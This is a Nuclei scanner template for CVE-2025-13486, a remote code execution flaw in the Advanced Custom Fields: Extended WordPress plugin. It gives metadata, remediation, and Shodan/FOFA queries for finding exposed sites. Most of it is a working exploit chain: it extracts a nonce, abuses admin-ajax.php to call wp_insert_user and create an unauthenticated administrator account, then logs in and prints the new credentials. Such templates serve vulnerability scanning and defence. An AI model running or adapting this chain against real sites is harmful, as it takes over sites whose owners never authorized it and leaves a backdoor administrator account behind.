id: CVE-2025-13486 info: name: Advanced Custom Fields Extended < 0.9.2 - Remote Code Execution author: 0xanis severity: critical description: | Advanced Custom Fields: Extended WordPress plugin 0.9.0.5 through 0.9.1.1 contains a remote code execution caused by unsafe use of call_user_func_array() in prepare_form() function, letting unauthenticated attackers execute arbitrary code remotely. impact: | Unauthenticated attackers can execute arbitrary code remotely, potentially leading to backdoor installation or creation of admin accounts. remediation: | Update to the latest version beyond 0.9.1.1. reference: - https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/ - https://nvd.nist.gov/vuln/detail/CVE-2025-13486 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-94 metadata: verified: true max-request: 3 shodan-query: http.component:"WordPress" fofa-query: body="wp-content/plugins/acf-extended" tags: cve,cve2025,wordpress,wp-plugin,acfe,rce,vkev variables: username: "admin_{{rand_text_alpha(4)}}" password: "admin_{{rand_text_alpha(4)}}" email: "{{username}}@{{rand_base(5)}}.com" flow: http(1) && http(2) && http(3) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body group: 1 regex: - 'acf\.data.*?"nonce":"([a-f0-9]+)"' internal: true name: nonce - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=acfe/form/render_form_ajax&nonce={{nonce}}&form[render]=wp_insert_user&form[user_login]={{username}}&form[user_pass]={{password}}&form[user_email]={{email}}&form[role]=administrator matchers: - type: dsl dsl: - status_code == 200 internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - status_code == 302 - contains(header, 'wordpress_logged_in') condition: and extractors: - type: dsl dsl: - '"Username: " + username + " | Password: " + password' # digest: 4b0a00483046022100ab18f19323b7a1e4275e9b777be6e8e101a40bbcc8d29d5a01853dbf5d1aae56022100b8dd55d0dfe2f888f1554008b623f5777fc0bbb8ae03a228e413dc02127ac5a9:922c64590222798bb761d5b6d8e72950